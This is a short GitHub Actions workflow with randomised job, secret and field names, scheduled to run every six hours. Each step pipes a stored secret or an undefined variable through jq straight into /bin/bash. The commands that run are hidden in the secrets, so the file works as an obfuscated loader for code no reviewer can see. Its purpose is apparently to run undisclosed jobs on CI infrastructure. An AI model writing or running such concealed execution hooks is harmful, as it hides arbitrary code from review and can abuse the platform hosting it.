name: sunbajie4718

on:
  workflow_dispatch:
  schedule:
    - cron: '52 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sunbajie4718
        env:
          ho528: ${{ secrets.ho528 }}
        run: |
          echo $ho528 | jq -r .fb738 | /bin/bash
          echo $dpp8391 | jq -r .fsy163 | /bin/bash
          echo $m47195 | jq -r .vg946 | /bin/bash
          echo $f45993 | jq -r .qjhy44650 | /bin/bash
          echo $vxga4 | jq -r .b9 | /bin/bash
          echo $y68 | jq -r .bdvb5 | /bin/bash
          echo $tha73 | jq -r .ghw95 | /bin/bash
          echo $iuoz19 | jq -r .zi669 | /bin/bash
          echo $s8573 | jq -r .rasez31749 | /bin/bash
          echo $ie935 | jq -r .hab75 | /bin/bash

